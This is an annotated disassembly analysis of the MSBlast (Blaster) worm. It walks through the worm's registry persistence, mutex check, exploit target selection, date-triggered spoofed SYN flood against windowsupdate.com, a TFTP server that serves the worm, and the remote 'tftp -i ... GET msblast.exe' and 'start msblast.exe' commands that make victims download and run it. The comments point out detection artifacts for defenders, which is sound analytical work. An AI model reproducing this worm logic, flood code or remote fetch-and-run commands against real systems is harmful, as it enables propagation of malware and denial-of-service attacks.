msblast蠕虫主要代码分析

;Persistence: write an autostart value under HKLM\...\Run (hive 0x80000002 = HKEY_LOCAL_MACHINE); this is the entry of the routine at 00401250
:00401250 55push ebp
:00401251 89E5mov ebp, esp
:00401253 81ECAC030000sub esp, 000003AC;0x3AC bytes of locals
:00401259 56push esi
:0040125A 57push edi
:0040125B 31F6xor esi, esi
;RegCreateKeyExA(HKLM, "SOFTWARE\...\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL); arguments are pushed right-to-left
:0040125D 6A00push 00000000;lpdwDisposition = NULL
:0040125F 8D45F8lea eax, dword ptr [ebp-08]
:00401262 50push eax;phkResult: [ebp-08] receives the key handle
:00401263 6A00push 00000000;lpSecurityAttributes = NULL
:00401265 683F000F00push 000F003F;samDesired = KEY_ALL_ACCESS
:0040126A 6A00push 00000000;dwOptions
:0040126C 6A00push 00000000;lpClass
:0040126E 6A00push 00000000;Reserved
:00401270 685D484000push 0040485D;db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
:00401275 6802000080push 80000002;HKEY_LOCAL_MACHINE
:0040127A E80D110000Call 0040238C;ADVAPI32.RegCreateKeyExA (return value is not checked)
;RegSetValueExA(hKey, "windows auto update", 0, REG_SZ, "msblast.exe", 0x32)
:0040127F 6A32push 00000032;cbData = 50 bytes, more than the 12-byte string, so the bytes following it in .data are stored as well
:00401281 683C404000push 0040403C;db 'msblast.exe',0
:00401286 6A01push 00000001;dwType = REG_SZ
:00401288 6A00push 00000000;Reserved
:0040128A 6849484000push 00404849;db 'windows auto update',0 (the value name; a useful host-based detection artifact)
:0040128F FF75F8push [ebp-08];hKey
:00401292 E801110000Call 00402398;ADVAPI32.RegSetValueExA
:00401297 FF75F8push [ebp-08]
:0040129A E8E1100000Call 00402380;ADVAPI32.RegCloseKey
;Single-instance check: CreateMutexA(NULL, TRUE, "BILLY"); the test on its result lies past this excerpt
:0040129F 6843484000push 00404843;db 'BILLY',0
:004012A4 6A01push 00000001;bInitialOwner = TRUE
:004012A6 6A00push 00000000;lpMutexAttributes = NULL
:004012A8 E8A3100000Call 00402350;KERNEL32.CreateMutexA
……………………
;Random per-run parameter selection (excerpt from inside the routine that begins at 00401250)
:00401476 E8BD0E0000Call 00402338;KERNEL32.GetTickCount
:0040147B 50push eax;the GetTickCount result is used as the srand() seed
:0040147C E8B30F0000Call 00402434;CRTDLL.srand
:00401481 59pop ecx;cdecl: caller removes the argument
:00401482 E8890F0000Call 00402410;CRTDLL.rand
:00401487 B914000000mov ecx, 00000014
:0040148C 99cdq;sign-extend eax into edx:eax before idiv
:0040148D F7F9idiv ecx;edx = rand() % 20
:0040148F 83FA0Ccmp edx, 0000000C
:00401492 7D02jge 00401496
:00401494 31F6xor esi, esi;esi = 0 when rand()%20 < 12 (12 of 20 cases); what esi controls is outside this excerpt
:00401496 C7053431400001000000mov dword ptr [00403134], 00000001;[00403134] = target-OS flag, default 1 (Windows XP; consumed at 00401954)
:004014A0 E86B0F0000Call 00402410;CRTDLL.rand
:004014A5 B90A000000mov ecx, 0000000A
:004014AA 99cdq
:004014AB F7F9idiv ecx;edx = rand() % 10
:004014AD 83FA07cmp edx, 00000007
:004014B0 7E0Ajle 004014BC
:004014B2 C7053431400002000000mov dword ptr [00403134], 00000002;flag = 2 (Windows 2000) only when edx is 8 or 9, i.e. 2 of 10 cases
……………………
;Choose the OS-specific value placed in the exploit payload, based on the flag set at 00401496 / 004014B2
:00401954 833D3431400001cmp dword ptr [00403134], 00000001;compare the flag to decide whether the payload targets Windows 2000 or XP
:0040195B 750Cjne 00401969
:0040195D C785ECEAFFFF9D130001mov dword ptr [ebp+FFFFEAEC], 0100139D;use the Windows XP jump address
:00401967 EB0Ajmp 00401973
:00401969 C785ECEAFFFF9F751800mov dword ptr [ebp+FFFFEAEC], 0018759F;use the Windows 2000 jump address
……………………
;Date gate for the DoS thread (excerpt from inside the routine that begins at 00401250)
;GetDateFormatA(0x409, 0, NULL, "d", [ebp-0C], 3): day of month as text
:004014FC 6A03push 00000003;size of buffer
:004014FE 8D45F4lea eax, dword ptr [ebp-0C]
:00401501 50push eax;buffer
:00401502 683C484000push 0040483C;db 'd',0  format picture: day of month
:00401507 6A00push 00000000;lpDate = NULL, i.e. the current system date
:00401509 6A00push 00000000;dwFlags
:0040150B 6809040000push 00000409;"0409" = en-US locale
;Judging from the Locale argument passed to GetDateFormatA, the author's system used the US regional setting.
:00401510 E8E70D0000Call 004022FC;KERNEL32.GetDateFormatA
;GetDateFormatA(0x409, 0, NULL, "M", [ebp-10], 3): month as text
:00401515 6A03push 00000003
:00401517 8D45F0lea eax, dword ptr [ebp-10]
:0040151A 50push eax
:0040151B 683A484000push 0040483A;db 'M',0  format picture: month
:00401520 6A00push 00000000
:00401522 6A00push 00000000
:00401524 6809040000push 00000409
:00401529 E8CE0D0000Call 004022FC;KERNEL32.GetDateFormatA
:0040152E 8D45F4lea eax, dword ptr [ebp-0C]
:00401531 50push eax
:00401532 E8790E0000Call 004023B0;CRTDLL.atoi(day)
:00401537 59pop ecx;cdecl cleanup
:00401538 83F80Fcmp eax, 0000000F;day > 15 ?
:0040153B 7F0Fjg 0040154C;yes: create the DoS thread regardless of month
:0040153D 8D7DF0lea edi, dword ptr [ebp-10]
:00401540 57push edi
:00401541 E86A0E0000Call 004023B0;CRTDLL.atoi(month)
:00401546 59pop ecx
:00401547 83F808cmp eax, 00000008;month > 8 ?
:0040154A 7E16jle 00401562;no (January..August with day <= 15): skip the DoS thread; month > 8 falls through to create it
;Net effect: the flood thread starts on the 16th or later of any month, and on every day from September through December
;CreateThread(NULL, 0, 00401EC1, NULL, 0, &[ebp-04])
:0040154C 8D45FClea eax, dword ptr [ebp-04]
:0040154F 50push eax;lpThreadId
:00401550 6A00push 00000000;dwCreationFlags
:00401552 6A00push 00000000;lpParameter
:00401554 68C11E4000push 00401EC1;DoS thread routine
:00401559 6A00push 00000000;dwStackSize
:0040155B 6A00push 00000000;lpThreadAttributes
:0040155D E8120E0000Call 00402374;KERNEL32.CreateThread
……………………
;Address-resolution helper: sub_401E8B(const char *s), cdecl, result in eax
;Accepts a dotted-quad string or a host name; returns the IPv4 address in network order, or 0xFFFFFFFF (INADDR_NONE) when lookup fails.
:00401E8B 55push ebp
:00401E8C 89E5mov ebp, esp
:00401E8E 56push esi
:00401E8F 57push edi
:00401E90 FF7508push [ebp+08];s
:00401E93 E8D8020000Call 00402170;WS2_32.inet_addr
:00401E98 89C7mov edi, eax;edi = parsed address, or INADDR_NONE
:00401E9A 31F6xor esi, esi
:00401E9C 83FFFFcmp edi, FFFFFFFF
:00401E9F 751Ajne 00401EBB;if s already was an IP address, return it as-is; otherwise resolve the host name first
:00401EA1 FF7508push [ebp+08]
:00401EA4 E827030000Call 004021D0;WS2_32.gethostbyname
:00401EA9 89C6mov esi, eax;esi = struct hostent *, or NULL
:00401EAB 09F6or esi, esi
:00401EAD 7505jne 00401EB4
:00401EAF 83C8FFor eax, FFFFFFFF;lookup failed: return INADDR_NONE (the caller at 00401EDA does not check for this)
:00401EB2 EB09jmp 00401EBD
:00401EB4 8B460Cmov eax, dword ptr [esi+0C];hostent->h_addr_list
:00401EB7 8B00mov eax, dword ptr [eax];h_addr_list[0]
:00401EB9 8B38mov edi, dword ptr [eax];first IPv4 address of the host
:00401EBB 89F8mov eax, edi
:00401EBD 5Fpop edi
:00401EBE 5Epop esi
:00401EBF 5Dpop ebp
:00401EC0 C3ret;cdecl: the caller pops the argument (see 00401ED9)

;DoS thread routine: sub_401EC1(LPVOID param), stdcall (ret 4), the start address passed to CreateThread at 0040155D
;Resolves windowsupdate.com, opens a raw IP socket with IP_HDRINCL, then loops forever sending one packet every 20 ms.
:00401EC1 55push ebp
:00401EC2 89E5mov ebp, esp
:00401EC4 51push ecx;reserves the single dword local at [ebp-04]
:00401EC5 53push ebx
:00401EC6 56push esi
:00401EC7 57push edi
:00401EC8 C745FC01000000mov [ebp-04], 00000001;optval = 1 for the setsockopt below
:00401ECF 68EC474000push 004047EC;db 'windowsupdate.com',0
:00401ED4 E8B2FFFFFFcall 00401E8B;address-resolution helper
:00401ED9 59pop ecx;cdecl cleanup
:00401EDA 89C6mov esi, eax;esi = resolved target IP (an INADDR_NONE result is not checked here)
;WSASocketA(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)
:00401EDC 6A01push 00000001;dwFlags = WSA_FLAG_OVERLAPPED
:00401EDE 6A00push 00000000;g
:00401EE0 6A00push 00000000;lpProtocolInfo
:00401EE2 68FF000000push 000000FF;protocol = IPPROTO_RAW
:00401EE7 6A03push 00000003;type = SOCK_RAW
:00401EE9 6A02push 00000002;af = AF_INET
:00401EEB E84C030000Call 0040223C;WS2_32.WSASocketA
:00401EF0 89C7mov edi, eax;edi = raw socket
:00401EF2 83F8FFcmp eax, FFFFFFFF;INVALID_SOCKET
:00401EF5 7504jne 00401EFB
:00401EF7 31C0xor eax, eax
:00401EF9 EB34jmp 00401F2F;return 0 without sending anything
;setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &optval, 4): the worm supplies its own IP header
:00401EFB 6A04push 00000004;optlen
:00401EFD 8D45FClea eax, dword ptr [ebp-04]
:00401F00 50push eax;&optval
:00401F01 6A02push 00000002;optname = IP_HDRINCL
:00401F03 6A00push 00000000;level = IPPROTO_IP
:00401F05 57push edi;sock
:00401F06 E8AD020000Call 004021B8;WS2_32.setsockopt
:00401F0B 83F8FFcmp eax, FFFFFFFF;SOCKET_ERROR
:00401F0E 7504jne 00401F14;jump on success
:00401F10 31C0xor eax, eax
:00401F12 EB1Bjmp 00401F2F
;Flood loop: send_packet(target_ip, sock); Sleep(20 ms); repeat
:00401F14 57push edi;sock
:00401F15 56push esi;target IP
:00401F16 E81B000000call 00401F36;packet-building/sending routine
:00401F1B 83C408add esp, 00000008;cdecl cleanup
:00401F1E 6A14push 00000014;20 ms between packets
:00401F20 E837040000Call 0040235C;KERNEL32.Sleep
:00401F25 EBEDjmp 00401F14;unconditional: the loop never exits, so the thread runs until the process ends
:00401F27 57push edi;unreachable: no path leads to this closesocket
:00401F28 E8C7020000Call 004021F4;WS2_32.closesocket
:00401F2D 31C0xor eax, eax
:00401F2F 5Fpop edi
:00401F30 5Epop esi
:00401F31 5Bpop ebx
:00401F32 C9leave
:00401F33 C20400ret 0004

;Packet routine: sub_401F36(dst_ip = [ebp+08], sock = [ebp+0C]), cdecl; builds and sends one TCP SYN with a partly spoofed source
;Frame layout (offsets relative to ebp):
;  [ebp-80]  16-byte sockaddr_in for sendto (family -80, port -7E, addr -7C)
;  [ebp-70]  12-byte TCP pseudo-header (src -70, dst -6C, zero -68, proto -67, tcp length -66)
;  [ebp-64]  output buffer: IP header at -64, TCP header at -50 (buf+20), 4 zero bytes at -3C (buf+40)
;  [ebp-28]  20-byte TCP header (sport -28, dport -26, seq -24, ack -20, offset -1C, flags -1B, window -1A, csum -18, urg -16)
;  [ebp-14]  20-byte IP header (ver/ihl -14, tos -13, length -12, id -10, frag -0E, ttl -0C, proto -0B, csum -0A, src -08, dst -04)
;  [ebp-82]  destination port; [ebp-92] dotted-quad string; [ebp-98]/[ebp-9C] saved rand() values
:00401F36 55push ebp
:00401F37 89E5mov ebp, esp
:00401F39 81EC9C000000sub esp, 0000009C
:00401F3F 53push ebx
:00401F40 56push esi
:00401F41 57push edi
:00401F42 8D7D9Clea edi, dword ptr [ebp-64]
:00401F45 8D35B0474000lea esi, dword ptr [004047B0]
:00401F4B B90F000000mov ecx, 0000000F
:00401F50 F3repz
:00401F51 A5movsd;copy 15 dwords (60 bytes) of a template at 004047B0 into the output buffer (template contents not shown in this excerpt)
:00401F52 66C7857EFFFFFF5000mov word ptr [ebp+FFFFFF7E], 0050;[ebp-82] = 80, the destination port used below
:00401F5B E8D8030000Call 00402338;KERNEL32.GetTickCount
:00401F60 50push eax;the GetTickCount result is used as the srand() seed
:00401F61 E8CE040000Call 00402434;CRTDLL.srand
:00401F66 E8A5040000Call 00402410;CRTDLL.rand
:00401F6B 898568FFFFFFmov dword ptr [ebp+FFFFFF68], eax;[ebp-98] = first rand()
:00401F71 E89A040000Call 00402410;CRTDLL.rand
:00401F76 B9FF000000mov ecx, 000000FF
:00401F7B 99cdq
:00401F7C F7F9idiv ecx
:00401F7E 52push edx;4th octet = rand() % 255
:00401F7F 8BBD68FFFFFFmov edi, dword ptr [ebp+FFFFFF68]
:00401F85 89F8mov eax, edi
:00401F87 B9FF000000mov ecx, 000000FF
:00401F8C 99cdq
:00401F8D F7F9idiv ecx
:00401F8F 52push edx;3rd octet = rand() % 255
:00401F90 FF3538314000push dword ptr [00403138];2nd octet: these two globals hold the first two octets of the local IP
:00401F96 FF3514304000push dword ptr [00403014];1st octet
;The spoofed source IP is not fully random: the first two octets are the real ones and only the last two are random.
;Probably done because some network devices do not let packets with a source outside the local network leave.
:00401F9C 682B484000push 0040482B;db '%i.%i.%i.%i',0
:00401FA1 8DBD6EFFFFFFlea edi, dword ptr [ebp+FFFFFF6E]
:00401FA7 57push edi;[ebp-92] receives the generated dotted-quad string
:00401FA8 E87B040000Call 00402428;CRTDLL.sprintf
:00401FAD 8D856EFFFFFFlea eax, dword ptr [ebp+FFFFFF6E]
:00401FB3 50push eax
:00401FB4 E8D2FEFFFFcall 00401E8B;address-resolution helper
:00401FB9 89C3mov ebx, eax;ebx = spoofed source IP in network order
;Build the sockaddr_in passed to sendto
:00401FBB 66C745800200mov [ebp-80], 0002;sin_family = AF_INET
:00401FC1 0FB7857EFFFFFFmovzx eax, word ptr [ebp+FFFFFF7E]
:00401FC8 50push eax
;destination port 80
:00401FC9 E88A010000Call 00402158;WS2_32.htons
:00401FCE 89C7mov edi, eax
:00401FD0 66897D82mov word ptr [ebp-7E], di;sin_port
:00401FD4 8B4508mov eax, dword ptr [ebp+08]
:00401FD7 894584mov dword ptr [ebp-7C], eax;sin_addr = target IP (first argument)
;IP header (the TOS byte at [ebp-13] is not written anywhere in this excerpt)
:00401FDA C645EC45mov [ebp-14], 45;version 4, IHL 5 (20-byte header)
:00401FDE 6A28push 00000028;total length 40 = 20 IP + 20 TCP
:00401FE0 E873010000Call 00402158;WS2_32.htons
:00401FE5 89C7mov edi, eax
:00401FE7 66897DEEmov word ptr [ebp-12], di;total length, network order
:00401FEB 66C745F00100mov [ebp-10], 0001;identification = 1, a constant: a traffic fingerprint
:00401FF1 66C745F20000mov [ebp-0E], 0000;flags / fragment offset = 0
:00401FF7 C645F480mov [ebp-0C], 80;TTL = 128
:00401FFB C645F506mov [ebp-0B], 06;protocol = TCP
:00401FFF 66C745F60000mov [ebp-0A], 0000;header checksum, filled in at 00402127
:00402005 8B4508mov eax, dword ptr [ebp+08]
:00402008 8945FCmov dword ptr [ebp-04], eax;destination IP
;TCP header
:0040200B 0FB7857EFFFFFFmovzx eax, word ptr [ebp+FFFFFF7E]
:00402012 50push eax
:00402013 E840010000Call 00402158;WS2_32.htons
:00402018 89C7mov edi, eax
:0040201A 66897DDAmov word ptr [ebp-26], di;destination port = 80
:0040201E 8365E000and dword ptr [ebp-20], 00000000;acknowledgment number = 0
:00402022 C645E450mov [ebp-1C], 50;data offset 5 (20-byte header, no options)
:00402026 C645E502mov [ebp-1B], 02;flags = SYN only
:0040202A 6800400000push 00004000;TCP window 16384
:0040202F E824010000Call 00402158;WS2_32.htons
:00402034 89C7mov edi, eax
:00402036 66897DE6mov word ptr [ebp-1A], di;[ebp-1A] TCP window = 16384
:0040203A 66C745EA0000mov [ebp-16], 0000;urgent pointer = 0
:00402040 66C745E80000mov [ebp-18], 0000;TCP checksum, filled in at 004020EB
;TCP pseudo-header used for the checksum
:00402046 8B45FCmov eax, dword ptr [ebp-04]
:00402049 894594mov dword ptr [ebp-6C], eax;[ebp-6C] destination IP
:0040204C C6459800mov [ebp-68], 00;reserved zero byte
:00402050 C6459906mov [ebp-67], 06;protocol = TCP
:00402054 6A14push 00000014
:00402056 E8FD000000Call 00402158;WS2_32.htons
:0040205B 89C7mov edi, eax
:0040205D 66897D9Amov word ptr [ebp-66], di;TCP length = 20
:00402061 895DF8mov dword ptr [ebp-08], ebx;IP source = spoofed address
:00402064 E8A7030000Call 00402410;CRTDLL.rand
:00402069 B9E8030000mov ecx, 000003E8
:0040206E 99cdq
:0040206F F7F9idiv ecx;edx = rand() % 1000
:00402071 89D7mov edi, edx
:00402073 81C7E8030000add edi, 000003E8;source port always lands in 1000..1999
:00402079 81E7FFFF0000and edi, 0000FFFF
:0040207F 57push edi;randomly chosen source port
:00402080 E8D3000000Call 00402158;WS2_32.htons
:00402085 89C7mov edi, eax
:00402087 66897DD8mov word ptr [ebp-28], di;TCP source port
:0040208B E880030000Call 00402410;CRTDLL.rand
:00402090 898564FFFFFFmov dword ptr [ebp+FFFFFF64], eax;[ebp-9C] = high half candidate
:00402096 E875030000Call 00402410;CRTDLL.rand;intended as a 32-bit random sequence number
:0040209B 8BBD64FFFFFFmov edi, dword ptr [ebp+FFFFFF64]
:004020A1 C1E710shl edi, 10
:004020A4 09C7or edi, eax
:004020A6 81E7FFFF0000and edi, 0000FFFF;discards the upper half just assembled: only 16 random bits survive
:004020AC 57push edi
:004020AD E8A6000000Call 00402158;WS2_32.htons
:004020B2 89C7mov edi, eax
:004020B4 81E7FFFF0000and edi, 0000FFFF
:004020BA 897DDCmov dword ptr [ebp-24], edi;sequence number: two swapped random bytes followed by two zero bytes (another fingerprint)
:004020BD 895D90mov dword ptr [ebp-70], ebx;pseudo-header source IP
;Checksum pass 1: pseudo-header (12) + TCP header (20) -> TCP checksum
:004020C0 6A0Cpush 0000000C
:004020C2 8D4590lea eax, dword ptr [ebp-70]
:004020C5 50push eax
:004020C6 8D459Clea eax, dword ptr [ebp-64]
:004020C9 50push eax
:004020CA E81D030000Call 004023EC;CRTDLL.memcpy(buf, pseudo_hdr, 12)
:004020CF 6A14push 00000014
:004020D1 8D45D8lea eax, dword ptr [ebp-28]
:004020D4 50push eax
:004020D5 8D45A8lea eax, dword ptr [ebp-58]
:004020D8 50push eax
:004020D9 E80E030000Call 004023EC;CRTDLL.memcpy(buf+12, tcp_hdr, 20)
:004020DE 6A20push 00000020
:004020E0 8D459Clea eax, dword ptr [ebp-64]
:004020E3 50push eax
:004020E4 E857FDFFFFcall 00401E40;presumably a ones-complement checksum over 32 bytes (the routine itself is not shown in this excerpt)
:004020E9 89C7mov edi, eax
:004020EB 66897DE8mov word ptr [ebp-18], di;TCP checksum
;Checksum pass 2: IP header (20) + TCP header (20) + 4 zero bytes -> IP checksum
:004020EF 6A14push 00000014
:004020F1 8D45EClea eax, dword ptr [ebp-14]
:004020F4 50push eax
:004020F5 8D459Clea eax, dword ptr [ebp-64]
:004020F8 50push eax
:004020F9 E8EE020000Call 004023EC;CRTDLL.memcpy(buf, ip_hdr, 20)
:004020FE 6A14push 00000014
:00402100 8D45D8lea eax, dword ptr [ebp-28]
:00402103 50push eax
:00402104 8D45B0lea eax, dword ptr [ebp-50];[ebp-50] = buf+20, where the TCP header (source port first) is placed
:00402107 50push eax
:00402108 E8DF020000Call 004023EC;CRTDLL.memcpy(buf+20, tcp_hdr, 20)
:0040210D 6A04push 00000004
:0040210F 6A00push 00000000
:00402111 8D45C4lea eax, dword ptr [ebp-3C]
:00402114 50push eax
:00402115 E8DE020000Call 004023F8;CRTDLL.memset(buf+40, 0, 4)
:0040211A 6A28push 00000028
:0040211C 8D459Clea eax, dword ptr [ebp-64]
:0040211F 50push eax
:00402120 E81BFDFFFFcall 00401E40;NOTE(review): this pass covers 0x28 bytes (IP + TCP), not only the 20-byte IP header; confirm what 00401E40 computes before assuming the IP checksum is valid
:00402125 89C7mov edi, eax
:00402127 66897DF6mov word ptr [ebp-0A], di;IP header checksum
:0040212B 6A14push 00000014
:0040212D 8D45EClea eax, dword ptr [ebp-14]
:00402130 50push eax
:00402131 8D459Clea eax, dword ptr [ebp-64]
:00402134 50push eax
:00402135 E8B2020000Call 004023EC;CRTDLL.memcpy(buf, ip_hdr, 20) again, now including the checksum
:0040213A 83C478add esp, 00000078;removes the arguments of every cdecl call above in one go
;sendto(sock, buf, 40, 0, &sockaddr, 16)
:0040213D 6A10push 00000010;sizeof(sockaddr_in)
:0040213F 8D4580lea eax, dword ptr [ebp-80]
:00402142 50push eax
:00402143 6A00push 00000000;flags
:00402145 6A28push 00000028;40 bytes
:00402147 8D459Clea eax, dword ptr [ebp-64]
:0040214A 50push eax
:0040214B FF750Cpush [ebp+0C];raw socket (second argument)
:0040214E E859000000Call 004021AC;WS2_32.sendto: one packet per call; the result is not checked
:00402153 5Fpop edi
:00402154 5Epop esi
:00402155 5Bpop ebx
:00402156 C9leave
:00402157 C3ret

………………

;TFTP server thread routine: sub_401576, started by CreateThread at 00401CD1
;Listens on UDP/69 and serves the worm's own executable in reply to the first datagram (the rest of the routine is cut from this excerpt).
:00401576 55push ebp
:00401577 89E5mov ebp, esp
:00401579 81EC2C040000sub esp, 0000042C
:0040157F 53push ebx
:00401580 56push esi
:00401581 57push edi
:00401582 C7053840400001000000mov dword ptr [00404038], 00000001;[00404038] = "tftp server active" flag, polled at 00401D4D and cleared at 00401E20
;socket(AF_INET, SOCK_DGRAM, 0)
:0040158C 6A00push 00000000;protocol
:0040158E 6A02push 00000002;SOCK_DGRAM, i.e. UDP
:00401590 6A02push 00000002;AF_INET
:00401592 E82D0C0000Call 004021C4;WS2_32.socket
:00401597 A324314000mov dword ptr [00403124], eax;global socket handle (closed by the sender at 00401E1B)
:0040159C 83F8FFcmp eax, FFFFFFFF;INVALID_SOCKET
:0040159F 0F8445010000je 004016EA
;memset(&sa, 0, 16), sa at [ebp-228]
:004015A5 6A10push 00000010
:004015A7 6A00push 00000000
:004015A9 8D85D8FDFFFFlea eax, dword ptr [ebp+FFFFFDD8]
:004015AF 50push eax
:004015B0 E8430E0000Call 004023F8;CRTDLL.memset
:004015B5 83C40Cadd esp, 0000000C;cdecl cleanup
:004015B8 66C785D8FDFFFF0200mov word ptr [ebp+FFFFFDD8], 0002;sin_family = AF_INET
:004015C1 6A45push 00000045;listen on port 69 (tftp)
:004015C3 E8900B0000Call 00402158;WS2_32.htons
:004015C8 89C2mov edx, eax
:004015CA 668995DAFDFFFFmov word ptr [ebp+FFFFFDDA], dx;sin_port
:004015D1 83A5DCFDFFFF00and dword ptr [ebp+FFFFFDDC], 00000000;sin_addr = INADDR_ANY
;bind(sock, &sa, 16)
:004015D8 6A10push 00000010
:004015DA 8D85D8FDFFFFlea eax, dword ptr [ebp+FFFFFDD8]
:004015E0 50push eax
:004015E1 FF3524314000push dword ptr [00403124]
:004015E7 E8F00B0000Call 004021DC;WS2_32.bind
:004015EC 09C0or eax, eax
:004015EE 0F85F6000000jne 004016EA;bind failed (e.g. port already in use): give up
;recvfrom(sock, buf [ebp-42C], 0x204, 0, &from [ebp-218], &fromlen [ebp-208])
:004015F4 C785F8FDFFFF10000000mov dword ptr [ebp+FFFFFDF8], 00000010;fromlen = 16
:004015FE 8D85F8FDFFFFlea eax, dword ptr [ebp+FFFFFDF8]
:00401604 50push eax
:00401605 8D85E8FDFFFFlea eax, dword ptr [ebp+FFFFFDE8]
:0040160B 50push eax
:0040160C 6A00push 00000000
:0040160E 6804020000push 00000204;buffer length 516
:00401613 8D85D4FBFFFFlea eax, dword ptr [ebp+FFFFFBD4]
:00401619 50push eax
:0040161A FF3524314000push dword ptr [00403124]
:00401620 E8630B0000Call 00402188;WS2_32.recvfrom
:00401625 83F801cmp eax, 00000001;any datagram of at least one byte is treated as a request
:00401628 0F8CBC000000jl 004016EA
:0040162E 31DBxor ebx, ebx
;fopen(<own path>, "rb")
:00401630 6837484000push 00404837;db 'rb',0  open read-only, binary mode
:00401635 6820304000push 00403020;address of the worm's own absolute path
:0040163A E8950D0000Call 004023D4;CRTDLL.fopen
;This worm's tftp server works the same way Nimda's did: whatever file name is requested, it returns the worm file,
;so this tftp server cannot leak system files. Unlike Nimda, the server only runs after a machine has been attacked
;successfully, so it is normal not to see anything listening on UDP/69 on a system infected with msblast.exe.

………………

;Remote-command phase: start the tftp server thread, then instruct the remote side to fetch and run the worm
;The enclosing function begins above this excerpt; [ebp-1208] holds the socket connected to the remote side (established earlier, not shown).
;CreateThread(NULL, 0, 00401576, NULL, 0, &[ebp-1934])
:00401CBD 8D85CCE6FFFFlea eax, dword ptr [ebp+FFFFE6CC]
:00401CC3 50push eax;lpThreadId
:00401CC4 6A00push 00000000;dwCreationFlags
:00401CC6 6A00push 00000000;lpParameter
:00401CC8 6876154000push 00401576;tftp server thread routine
:00401CCD 6A00push 00000000;dwStackSize
:00401CCF 6A00push 00000000;lpThreadAttributes
:00401CD1 E89E060000Call 00402374;KERNEL32.CreateThread
:00401CD6 8985C0EDFFFFmov dword ptr [ebp+FFFFEDC0], eax;[ebp-1240] = thread handle
:00401CDC 6A50push 00000050;80 ms
:00401CDE E879060000Call 0040235C;KERNEL32.Sleep
;sprintf(cmd [ebp-1204], "tftp -i %s GET %s", <local IP string>, "msblast.exe")
:00401CE3 683C404000push 0040403C;db 'msblast.exe',0
:00401CE8 6800304000push 00403000;local IP as a string
:00401CED 680C484000push 0040480C;db 'tftp -i %s GET %s',0
:00401CF2 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401CF8 50push eax
:00401CF9 E82A070000Call 00402428;CRTDLL.sprintf
:00401CFE 83C410add esp, 00000010;cdecl cleanup
;inline strlen(cmd): eax counts up from 0 until the NUL byte
:00401D01 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401D07 83C8FFor eax, FFFFFFFF
:00401D0A 40inc eax
:00401D0B 803C0100cmp byte ptr [ecx+eax], 00
:00401D0F 75F9jne 00401D0A
;send(sock, cmd, len, 0)
:00401D11 6A00push 00000000;flags
:00401D13 50push eax;len
:00401D14 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D1A 50push eax
:00401D1B FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401D21 E87A040000Call 004021A0;WS2_32.send
:00401D26 83F801cmp eax, 00000001
:00401D29 0F8CBC000000jl 00401DEB;nothing sent: go to cleanup
:00401D2F 68E8030000push 000003E8;1000 ms
:00401D34 E823060000Call 0040235C;KERNEL32.Sleep
:00401D39 31DBxor ebx, ebx;ebx = poll counter
:00401D3B EB0Bjmp 00401D48

:00401D3D 68D0070000push 000007D0;2000 ms
:00401D42 E815060000Call 0040235C;KERNEL32.Sleep
:00401D47 43inc ebx

;Wait loop: up to 10 rounds of 2 s while the "tftp server active" flag [00404038] is still set
;NOTE(review): whatever clears the flag after a finished transfer lies in the part of the server routine not shown; confirm before relying on it.
:00401D48 83FB0Acmp ebx, 0000000A
:00401D4B 7D09jge 00401D56;stop waiting after 10 rounds (about 20 s)
:00401D4D 833D3840400000cmp dword ptr [00404038], 00000000
:00401D54 75E7jne 00401D3D
;sprintf(cmd, "start %s", "msblast.exe")
:00401D56 683C404000push 0040403C;db 'msblast.exe',0
:00401D5B 6802484000push 00404802;db 'start %s',0
:00401D60 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D66 50push eax
:00401D67 E8BC060000Call 00402428;CRTDLL.sprintf
:00401D6C 83C40Cadd esp, 0000000C
:00401D6F 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401D75 83C8FFor eax, FFFFFFFF

;inline strlen(cmd)
:00401D78 40inc eax
:00401D79 803C0100cmp byte ptr [ecx+eax], 00
:00401D7D 75F9jne 00401D78
:00401D7F 6A00push 00000000
:00401D81 50push eax
:00401D82 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D88 50push eax
:00401D89 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401D8F E80C040000Call 004021A0;WS2_32.send
:00401D94 83F801cmp eax, 00000001
:00401D97 7C52jl 00401DEB
:00401D99 68D0070000push 000007D0;2000 ms
:00401D9E E8B9050000Call 0040235C;KERNEL32.Sleep
;sprintf(cmd, "%s", "msblast.exe"): the bare file name, sent a second time
:00401DA3 683C404000push 0040403C;db 'msblast.exe',0
:00401DA8 68FE474000push 004047FE;db '%s',0
:00401DAD 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401DB3 50push eax
:00401DB4 E86F060000Call 00402428;CRTDLL.sprintf
:00401DB9 83C40Cadd esp, 0000000C
:00401DBC 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401DC2 83C8FFor eax, FFFFFFFF
:00401DC5 40inc eax
:00401DC6 803C0100cmp byte ptr [ecx+eax], 00
:00401DCA 75F9jne 00401DC5
:00401DCC 6A00push 00000000
:00401DCE 50push eax
:00401DCF 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401DD5 50push eax
:00401DD6 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401DDC E8BF030000Call 004021A0;WS2_32.send (result not checked this time)
:00401DE1 68D0070000push 000007D0
:00401DE6 E871050000Call 0040235C;KERNEL32.Sleep
;Cleanup: close the remote socket, stop the tftp server thread if it is still active, close its handle
:00401DEB 83BDF8EDFFFF00cmp dword ptr [ebp+FFFFEDF8], 00000000
:00401DF2 740Bje 00401DFF
:00401DF4 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401DFA E8F5030000Call 004021F4;WS2_32.closesocket
:00401DFF 833D3840400000cmp dword ptr [00404038], 00000000
:00401E06 741Fje 00401E27
:00401E08 6A00push 00000000;dwExitCode
:00401E0A FFB5C0EDFFFFpush dword ptr [ebp+FFFFEDC0];thread handle
